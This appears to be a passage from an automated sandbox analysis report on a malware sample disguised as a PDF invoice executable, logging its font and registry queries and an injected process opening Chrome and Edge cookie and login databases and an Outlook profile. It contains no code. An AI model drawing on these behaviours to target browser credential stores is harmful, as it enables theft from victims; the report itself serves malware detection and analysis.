Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information

Source: Yara match File source: 3.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000003.00000002.2242460905.0000000002830000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2930839169.0000000003610000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2932524352.0000000005870000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.2239761495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.2240933872.00000000018D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2930935773.00000000036F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2929623724.0000000003260000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2931097936.0000000003840000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: C:\Windows\SysWOW64\RpcPing.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
Source: C:\Windows\SysWOW64\RpcPing.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\RpcPing.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\RpcPing.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\RpcPing.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\RpcPing.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
Source: C:\Windows\SysWOW64\RpcPing.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
Source: C:\Windows\SysWOW64\RpcPing.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\SysWOW64\RpcPing.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Remote Access Functionality

